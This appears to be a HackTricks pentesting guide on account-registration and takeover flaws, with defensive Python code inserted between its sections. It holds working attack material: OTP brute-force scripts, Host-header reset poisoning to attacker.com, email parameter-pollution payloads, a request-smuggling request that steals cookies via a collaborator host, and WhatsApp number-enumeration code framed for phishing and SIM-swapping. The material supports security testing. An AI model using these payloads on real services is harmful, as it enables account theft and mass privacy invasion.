# Registration & Takeover Vulnerabilities
Tip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
## Registration Takeover
### Duplicate Registration
- Try to create an account using an already existing username
- Check email variations:
  - uppercase
  - +1@
  - add a dot in the email
  - special characters in the local part (%00, %09, %20)
  - put blank characters after the email: `test@test.com a`
  - `victim@gmail.com@attacker.com`
  - `victim@attacker.com@gmail.com`
- Try provider canonicalization tricks (service dependent):
  - Gmail ignores dots and subaddressing: `victim+1@gmail.com` and `v.ic.tim@gmail.com` deliver to `victim@gmail.com`
  - Some providers are case-insensitive in the local part
  - Some providers accept unicode confusables. Try homoglyphs and a soft hyphen (`\u00AD`) in the local part
- Abuse this to bypass uniqueness checks, obtain duplicate accounts/workspace invites, or block the victim's signup (temporary DoS) while preparing a takeover
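The defensive counterpart to the variations above, added here as an illustration and not HackTricks' own code: a canonicalization routine that reduces an address to the form a uniqueness check should compare and rejects the malformed shapes listed. The provider table is an assumption for the example; a real service keeps its own.

```python
import re
import unicodedata

# Assumption: illustrative provider table, not exhaustive.
DOT_INSENSITIVE = {"gmail.com", "googlemail.com"}
PLUS_SUBADDRESSING = {"gmail.com", "googlemail.com", "outlook.com", "fastmail.com"}
# Soft hyphen, zero-width characters and BOM survive copy/paste but are invisible.
INVISIBLE = {"\u00ad", "\u200b", "\u200c", "\u200d", "\ufeff"}
DOMAIN_RE = re.compile(r"[a-z0-9-]+(\.[a-z0-9-]+)+")


def canonicalize_email(raw: str) -> str:
    """Return the form to store and compare for uniqueness; raise on malformed input."""
    s = unicodedata.normalize("NFKC", raw)
    s = "".join(ch for ch in s if ch not in INVISIBLE)
    if not s.isascii():  # homoglyphs (Cyrillic "a", etc.) never equal the Latin address
        raise ValueError("non-ASCII address")
    if any(ch.isspace() or ord(ch) < 0x20 for ch in s):  # "%00", "%09", "%20", "x@y.com a"
        raise ValueError("whitespace or control character in address")
    if s.count("@") != 1:  # "victim@gmail.com@attacker.com" and friends
        raise ValueError("address must contain exactly one '@'")
    local, domain = s.split("@")
    local, domain = local.lower(), domain.lower().rstrip(".")
    if not local or not DOMAIN_RE.fullmatch(domain):
        raise ValueError("malformed local part or domain")
    if domain in PLUS_SUBADDRESSING:  # victim+1@gmail.com -> victim@gmail.com
        local = local.split("+", 1)[0]
    if domain in DOT_INSENSITIVE:  # v.ic.tim@gmail.com -> victim@gmail.com
        local = local.replace(".", "")
    if not local:
        raise ValueError("empty local part after canonicalization")
    return f"{local}@{domain}"


def canonicalize_username(raw: str) -> str:
    """Same idea for usernames: no surrounding or embedded whitespace, one fixed alphabet."""
    s = unicodedata.normalize("NFKC", raw).lower()
    if not re.fullmatch(r"[a-z0-9_.-]{3,32}", s):
        raise ValueError("username has whitespace or disallowed characters")
    return s


def accepts(fn, raw: str) -> bool:
    """True when fn accepts raw (usable as a form pre-check)."""
    try:
        fn(raw)
        return True
    except ValueError:
        return False
```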
### Username Enumeration
Check whether you can tell when a username is already registered in the application.
- Different error messages or HTTP status codes
- Response-time differences (an existing user may trigger a lookup against the IdP/DB)
- Profile fields auto-filled in the registration form for known email addresses
- Check team/invite flows: entering an email may reveal whether the account exists
### Password Policy
When creating an account, check the password policy (whether weak passwords are allowed).
If they are, you can try to bruteforce credentials.
### SQL Injection
Check this page to learn how to attempt account takeovers or extract information via SQL Injection in registration forms.
### OAuth Takeovers
### SAML Vulnerabilities
### Email Change
Once registered, try to change the email and check whether the change is properly validated or whether you can change it to arbitrary addresses.
### Additional Checks
- Check whether you can use disposable emails (mailinator, yopmail, 1secmail, etc.) or bypass the blocklist with subaddressing such as `victim+mailinator@gmail.com`
- A long password (>200 characters) leads to DoS
- Check rate limits on account creation
- Use `username@burp_collab.net` and analyze the callback
- If phone-number verification is used, check parsing/injection edge cases of the number
### Contact-discovery / identifier-enumeration oracles
Phone-number-centric messengers expose a presence oracle whenever the client syncs contacts. Replaying WhatsApp's discovery requests historically delivered >100M lookups per hour, enabling near-complete account enumerations.
#### Attack flow
- Instrument the official client to capture the address-book upload request (an authenticated blob of normalized E.164 numbers). Replay it with attacker-generated numbers while reusing the same cookies/device token.
- Batch numbers per request: WhatsApp accepts thousands of identifiers and returns registered/unregistered plus metadata (business, companion, etc.). Parse the responses offline to build a target list without messaging the victims.
- Scale the enumeration horizontally using SIM banks, cloud devices, or residential proxies so that per-account/IP/ASN limits are never triggered.
#### Dialing-plan modeling
Model each country's dialing plan to skip invalid candidates. The NDSS dataset (country-table.*) lists country codes, adoption density, and platform split so you can prioritize high-hit ranges. Example seeding code:
```python
import pandas as pd
from itertools import product

df = pd.read_csv("country-table.csv")
row = df[df["Country"] == "India"].iloc[0]
prefix = "+91"  # India mobile numbers are 10 digits
for suffix in product("0123456789", repeat=10):
    candidate = prefix + "".join(suffix)
    enqueue(candidate)  # enqueue() is the caller's own queue function, not defined here
```
Prioritize prefixes that match real allocations (Mobile Country Code + National Destination Code) before querying the oracle, to keep useful throughput.
#### Turning enumerations into targeted attacks
- Feed leaked phone numbers (e.g. Facebook's 2021 breach) into the oracle to learn which identities are still active before phishing, SIM-swapping, or spamming.
- Segment the census by country/OS/app type to find regions with weak SMS filtering or heavy WhatsApp Business usage for localized social engineering.
#### Public-key reuse correlation
WhatsApp exposes each account's X25519 identity key during session setup. Request the identity material for every enumerated number and deduplicate public keys to uncover account farms, cloned clients, or insecure firmware; shared keys deanonymize multi-SIM operations.
### Weak Email/Phone Verification (OTP/Magic Link)
Registration flows often verify ownership via a numeric OTP or a magic-link token. Typical weaknesses:
- Predictable or short OTP (4–6 digits) without effective rate limiting or IP/device tracking. Try parallel guessing and header/IP rotation.
- OTP reuse across actions or accounts, or not bound to a specific user/action (e.g. the same code works for login and signup, or still works after an email change).
- Multi-value smuggling: some backends accept several codes and verify if any of them matches. Try:
  - `code=000000&code=123456`
  - JSON arrays: `{"code":["000000","123456"]}`
  - Mixed parameter names: `otp=000000&one_time_code=123456`
  - Comma/pipe separated values: `code=000000,123456` or `code=000000|123456`
- Response oracle: distinguish wrong vs expired vs wrong-user codes by status/message/body length.
- Tokens not invalidated after success or after a password/email change.
- Verification token not bound to user agent/IP, allowing cross-origin completion from attacker-controlled pages.
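How a verification handler closes the weaknesses just listed, as an added example that is not part of the original page: one code per request, bound to a user and an action, attempt-limited, expiring, single-use, and compared in constant time. The record layout and limits are assumptions for the example.

```python
import hmac
import time
from dataclasses import dataclass

OTP_TTL_SECONDS = 300
MAX_ATTEMPTS = 5


@dataclass
class OtpRecord:
    """One issued code, bound to a user and a purpose (signup, login, email-change, ...)."""
    user_id: str
    purpose: str
    code: str
    issued_at: float
    attempts: int = 0
    used: bool = False


def single_code(params: dict, *names: str) -> str:
    """Extract exactly one six-digit code; reject every multi-value shape listed above."""
    present = [n for n in names if n in params]
    if len(present) != 1:  # otp=...&one_time_code=... (mixed names)
        raise ValueError("exactly one code parameter expected")
    value = params[present[0]]
    if isinstance(value, (list, tuple)):  # code=a&code=b or {"code":["a","b"]}
        raise ValueError("multiple values supplied")
    if not isinstance(value, str) or len(value) != 6 or not value.isdigit():
        raise ValueError("code must be exactly six digits")  # also rejects "a,b" and "a|b"
    return value


def verify_otp(params: dict, rec: OtpRecord, user_id: str, purpose: str, now=None) -> bool:
    """Every failure returns the same False; the HTTP layer must map it to one generic error."""
    now = time.time() if now is None else now
    if rec.used or rec.attempts >= MAX_ATTEMPTS or now - rec.issued_at > OTP_TTL_SECONDS:
        return False
    # Count before checking, so malformed and racing submissions also consume attempts.
    # In a real store this must be an atomic conditional update, not a read-then-write.
    rec.attempts += 1
    try:
        submitted = single_code(params, "code", "otp", "one_time_code")
    except ValueError:
        return False
    ok = (rec.user_id == user_id and rec.purpose == purpose  # bound to user and action
          and hmac.compare_digest(submitted, rec.code))      # constant-time compare
    if ok:
        rec.used = True  # single use: a replayed code or a second session fails
    return ok
```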
Bruteforcing example with ffuf against a JSON OTP endpoint:
```bash
ffuf -w <wordlist_of_codes> -u https://target.tld/api/verify -X POST \
  -H 'Content-Type: application/json' \
  -d '{"email":"victim@example.com","code":"FUZZ"}' \
  -fr 'Invalid|Too many attempts' -mc all
```
Parallel/concurrent guessing to bypass sequential lockouts (use Turbo Intruder in Burp):
Turbo Intruder snippet to flood 6-digit OTP attempts
```python
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=30,
                           requestsPerConnection=100)
    for code in range(0, 1000000):
        body = '{"email":"victim@example.com","code":"%06d"}' % code
        engine.queue(target.req, body=body)


def handleResponse(req, interesting):
    if req.status != 401 and b'Invalid' not in req.response:
        table.add(req)
```
- Try racing verification: submit the same valid OTP simultaneously in two sessions; sometimes one session becomes a verified attacker account while the victim flow also succeeds.
- Also test Host header poisoning on verification links (same as reset poisoning below) to leak or complete verification on an attacker-controlled host.
<a class="content_ref" href="rate-limit-bypass.md"><span class="content_ref_label">Rate Limit Bypass</span></a>
<a class="content_ref" href="2fa-bypass.md"><span class="content_ref_label">2FA/MFA/OTP Bypass</span></a>
<a class="content_ref" href="email-injections.md"><span class="content_ref_label">Email Injections</span></a>
## Account Pre‑Hijacking Techniques (before the victim signs up)
A powerful class of issues occurs when an attacker performs actions on the victim's email before the victim creates their account, then regains access later.
Key techniques to test (adapt to the target's flows):
- Classic–Federated Merge
  - Attacker: registers a classic account with the victim's email and sets a password
  - Victim: later signs up with SSO (same email)
  - Insecure merges may leave both parties logged in or resurrect the attacker's access
- Unexpired Session Identifier
  - Attacker: creates the account and holds a long‑lived session (doesn't log out)
  - Victim: recovers/sets the password and uses the account
  - Test whether old sessions stay valid after reset or MFA enablement
- Trojan Identifier
  - Attacker: adds a secondary identifier to the pre‑created account (phone, additional email, or links the attacker's IdP)
  - Victim: resets the password; the attacker later uses the trojan identifier to reset/login
- Unexpired Email Change
  - Attacker: initiates an email‑change to an attacker mailbox and withholds confirmation
  - Victim: recovers the account and starts using it
  - Attacker: later completes the pending email‑change to steal the account
- Non‑Verifying IdP
  - Attacker: uses an IdP that does not verify email ownership to assert `victim@…`
  - Victim: signs up via the classic route
  - The service merges on email without checking `email_verified` or performing local verification
### Practical tips
- Harvest flows and endpoints from web/mobile bundles. Look for classic signup, SSO linking, email/phone change, and password reset endpoints.
- Create realistic automation to keep sessions alive while you exercise other flows.
- For SSO tests, stand up a test OIDC provider and issue tokens with `email` claims for the victim address and `email_verified=false` to check if the RP trusts unverified IdPs.
- After any password reset or email change, verify that:
  - all other sessions and tokens are invalidated,
  - pending email/phone change capabilities are cancelled,
  - previously linked IdPs/emails/phones are re‑verified.
Note: Extensive methodology and case studies of these techniques are documented by Microsoft's pre‑hijacking research (see References at the end).
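What the relying party should do against the five pre-hijacking variants above, as an added example (not Microsoft's or HackTricks' code): a merge decision that refuses to link on an unverified or absent `email_verified` claim or onto a local account that never proved ownership, and a post-reset routine that drops old sessions, pending email changes and planted identifiers. The `Account` shape and the decision strings are assumptions for the example.

```python
from dataclasses import dataclass, field
from typing import Dict, Optional, Set


@dataclass
class Account:
    email: str
    email_verified: bool = False
    sessions: Set[str] = field(default_factory=set)          # active session ids
    pending_email_change: Optional[str] = None               # new address awaiting confirmation
    secondary_identifiers: Dict[str, bool] = field(default_factory=dict)  # phone/email -> verified
    linked_idps: Dict[str, bool] = field(default_factory=dict)             # issuer -> verified


def federated_merge_decision(claims: dict, account: Account) -> str:
    """What to do when an IdP asserts an email that already exists as a classic account."""
    if claims.get("email", "").lower() != account.email.lower():
        return "create_new"
    # Non-verifying IdP: a missing or false email_verified claim proves nothing.
    if claims.get("email_verified") is not True:
        return "require_local_verification"
    # Classic-Federated merge: the local side may have been pre-registered by an attacker,
    # so it must have completed its own email verification before anything is linked.
    if not account.email_verified:
        return "require_local_verification"
    return "link_after_reauth"  # merge only after the user proves the local password too


def on_password_reset(account: Account, fresh_session: str) -> Account:
    """Undo everything an attacker could have planted before the victim took over."""
    account.sessions = {fresh_session}           # unexpired session identifier
    account.pending_email_change = None          # unexpired email change
    for ident in account.secondary_identifiers:  # trojan identifier: must be re-verified
        account.secondary_identifiers[ident] = False
    for issuer in account.linked_idps:           # linked attacker IdP: same treatment
        account.linked_idps[issuer] = False
    return account
```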
<a class="content_ref" href="reset-password.md"><span class="content_ref_label">Reset/Forgotten Password Bypass</span></a>
<a class="content_ref" href="race-condition.md"><span class="content_ref_label">Race Condition</span></a>
## **Password Reset Takeover**
### Password Reset Token Leak Via Referrer <a href="#password-reset-token-leak-via-referrer" id="password-reset-token-leak-via-referrer"></a>
1. Request password reset to your email address
2. Click on the password reset link
3. Don’t change password
4. Click any 3rd party website (e.g. Facebook, Twitter)
5. Intercept the request in Burp Suite proxy
6. Check if the Referer header is leaking the password reset token.
### Password Reset Poisoning <a href="#account-takeover-through-password-reset-poisoning" id="account-takeover-through-password-reset-poisoning"></a>
1. Intercept the password reset request in Burp Suite
2. Add or edit the following headers in Burp Suite : `Host: attacker.com`, `X-Forwarded-Host: attacker.com`
3. Forward the request with the modified header:
```http
POST https://example.com/reset.php HTTP/1.1
Accept: */*
Content-Type: application/json
Host: attacker.com
```
4. Look for a password reset URL based on the _host header_ like : `https://attacker.com/reset-password.php?token=TOKEN`
### Password Reset Via Email Parameter <a href="#password-reset-via-email-parameter" id="password-reset-via-email-parameter"></a>
```bash
# parameter pollution
email=victim@mail.com&email=hacker@mail.com
# array of emails
{"email":["victim@mail.com","hacker@mail.com"]}
# carbon copy
email=victim@mail.com%0A%0Dcc:hacker@mail.com
email=victim@mail.com%0A%0Dbcc:hacker@mail.com
# separator
email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com
```
### IDOR on API Parameters
- The attacker has to log in with their own account and go to the Change password function.
- Start Burp Suite and intercept the request
- Send it to the repeater tab and edit the parameters: User ID/email
```http
POST /api/changepass
[...]
("form": {"email":"victim@email.com","password":"securepwd"})
```
### Weak Password Reset Token
The password reset token should be randomly generated and unique every time.
Try to determine whether the token expires or is always the same; in some cases the generation algorithm is weak and can be guessed. The following variables may be used by the algorithm:
- Timestamp
- UserID
- Email of User
- Firstname and Lastname
- Date of Birth
- Cryptography
- Number only
- Small token sequence (characters between [A-Z,a-z,0-9])
- Token reuse
- Token expiration date
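A reset flow hardened against the Host-header poisoning, email-parameter and weak-token issues from these sections, added here as an illustration and not the page's own code: the link origin comes from configuration, the email parameter must be exactly one plain address, and the token is random, stored only as a hash, expiring and single-use. `PUBLIC_ORIGIN`, the TTL and the in-memory `store` dict are assumptions for the example.

```python
import hashlib
import json
import re
import secrets
import time
from urllib.parse import parse_qs, quote

# Assumption: the public origin is configuration; Host / X-Forwarded-Host are never consulted.
PUBLIC_ORIGIN = "https://example.com"
RESET_TTL_SECONDS = 900
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+")


def parse_reset_email(body: bytes, content_type: str) -> str:
    """Accept exactly one plain address; reject pollution, arrays and injected headers."""
    if content_type.startswith("application/json"):
        value = json.loads(body).get("email")
    else:
        values = parse_qs(body.decode(), keep_blank_values=True).get("email", [])
        if len(values) != 1:  # email=victim&email=hacker
            raise ValueError("exactly one email parameter required")
        value = values[0]
    if not isinstance(value, str):  # {"email":[...]}
        raise ValueError("email must be a string")
    if not EMAIL_RE.fullmatch(value):  # CR/LF cc:/bcc:, commas, spaces, pipes
        raise ValueError("malformed address")
    return value.lower()


def reset_email_accepted(body: bytes, content_type: str) -> bool:
    try:
        parse_reset_email(body, content_type)
        return True
    except ValueError:
        return False


def issue_reset_token(store: dict, email: str, now=None) -> str:
    """Return the link to mail. Only a hash is stored, with owner and expiry."""
    now = time.time() if now is None else now
    token = secrets.token_urlsafe(32)  # 256 random bits: no timestamp, id, name or DOB inside
    store[hashlib.sha256(token.encode()).hexdigest()] = {
        "email": email, "exp": now + RESET_TTL_SECONDS, "used": False}
    return f"{PUBLIC_ORIGIN}/reset-password?token={quote(token)}"


def redeem_reset_token(store: dict, token: str, now=None):
    """Single-use and expiring; returns the owning email or None."""
    now = time.time() if now is None else now
    rec = store.get(hashlib.sha256(token.encode()).hexdigest())
    if rec is None or rec["used"] or now > rec["exp"]:
        return None
    rec["used"] = True
    return rec["email"]
```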
### Leaking Password Reset Token
- Trigger a password reset request via the API/UI for a specific email, e.g. test@mail.com
- Inspect the server response and check for `resetToken`
- Then use the token in a URL like `https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]`
### Password Reset via Username Collision
- Register on the system with a username identical to the victim's username, but with whitespace inserted before and/or after it, e.g. `"admin "`
- Request a password reset using your malicious username.
- Use the token sent to your email and reset the victim's password.
- Log in to the victim's account with the new password.
The platform CTFd was vulnerable to this attack.
See: CVE-2020-7245
### Account Takeover via Cross Site Scripting
- Find an XSS in the application or on a subdomain if the cookies are scoped to the parent domain: `*.domain.com`
- Leak the current session cookie
- Authenticate as the user using the cookie
### Account Takeover via HTTP Request Smuggling
- Use smuggler to detect the type of HTTP Request Smuggling (CL, TE, CL.TE)
```bash
git clone https://github.com/defparam/smuggler.git
cd smuggler
python3 smuggler.py -h
```
- Craft a request that will overwrite `POST / HTTP/1.1` with the following data: `GET http://something.burpcollaborator.net HTTP/1.1 X:`, with the goal of redirecting victims to burpcollab and stealing their cookies
- The final request could look like this:
```
GET / HTTP/1.1
Transfer-Encoding: chunked
Host: something.com
User-Agent: Smuggler/v1.0
Content-Length: 83

0

GET http://something.burpcollaborator.net HTTP/1.1
X: X
```
Hackerone reports exploiting this bug
### Account Takeover via CSRF
- Create a payload for the CSRF, e.g. "HTML form with auto submit for a password change"
- Send the payload
### Account Takeover via JWT
A JSON Web Token might be used to authenticate a user.
- Edit the JWT with another User ID / Email
- Check for a weak JWT signature
JWT Vulnerabilities (Json Web Tokens)
### Registration-as-Reset (Upsert on Existing Email)
Some signup handlers perform an upsert when the supplied email already exists. If the endpoint accepts a minimal body with email and password and does not enforce ownership verification, submitting the victim's email will overwrite their password pre-auth.
- Discovery: collect endpoint names from bundled JS (or mobile app traffic), then fuzz base paths such as /parents/application/v4/admin/FUZZ using ffuf/dirsearch.
- Method hints: a GET that returns messages like "Only POST request is allowed." often hints at the correct HTTP method and that a JSON body is expected.
- Minimal body seen in practice:
```json
{"email":"victim@example.com","password":"New@12345"}
```
PoC example:
```http
POST /parents/application/v4/admin/doRegistrationEntries HTTP/1.1
Host: www.target.tld
Content-Type: application/json

{"email":"victim@example.com","password":"New@12345"}
```
Impact: full account takeover (ATO) without any reset token, OTP or email verification.
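The upsert bug beside its fix, as an added example that is not the original page's or the affected application's code: `register_upsert` reproduces the overwrite described above, while `register_insert_only` never touches an existing row, parks new signups until the mailed token returns, and answers identically either way so the endpoint is not an existence oracle. The PBKDF2 hashing and the dict-based stores are assumptions for the example.

```python
import hashlib
import os
import secrets


# Assumption: PBKDF2 stands in for whatever password hash the real store uses.
def hash_password(pw: str) -> str:
    salt = os.urandom(16)
    return salt.hex() + ":" + hashlib.pbkdf2_hmac("sha256", pw.encode(), salt, 50_000).hex()


def verify_password(pw: str, stored: str) -> bool:
    salt_hex, dk_hex = stored.split(":")
    dk = hashlib.pbkdf2_hmac("sha256", pw.encode(), bytes.fromhex(salt_hex), 50_000)
    return secrets.compare_digest(dk.hex(), dk_hex)


def register_upsert(users: dict, email: str, password: str) -> dict:
    """VULNERABLE: the pattern described above. An existing row is overwritten, so anyone
    who knows the address replaces the owner's password with no token, OTP or mail check."""
    users[email] = {"password": hash_password(password), "verified": True}
    return {"status": "ok"}


def register_insert_only(users: dict, pending: dict, email: str, password: str) -> dict:
    """HARDENED: the signup path never touches an existing account. New addresses wait in a
    pending table until the mailed verification token comes back; the response is the same
    in both cases so the endpoint does not double as an account-existence oracle."""
    if email not in users:
        pending[email] = {"password": hash_password(password),
                          "token": secrets.token_urlsafe(32)}  # sent by mail, never returned
    return {"status": "check your inbox"}


def confirm_registration(users: dict, pending: dict, email: str, token: str) -> bool:
    """Promote a pending signup only with the right token and only if still unclaimed."""
    rec = pending.get(email)
    if rec is None or email in users or not secrets.compare_digest(rec["token"], token):
        return False
    del pending[email]
    users[email] = {"password": rec["password"], "verified": True}
    return True
```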
## References
- How I Found a Critical Password Reset Bug (Registration upsert ATO)
- Microsoft MSRC – Pre‑hijacking attacks on web user accounts (May 2022)
- https://salmonsec.com/cheatsheet/account_takeover
- Hey there! You are using WhatsApp: Enumerating Three Billion Accounts for Security and Privacy (NDSS 2026 paper & dataset)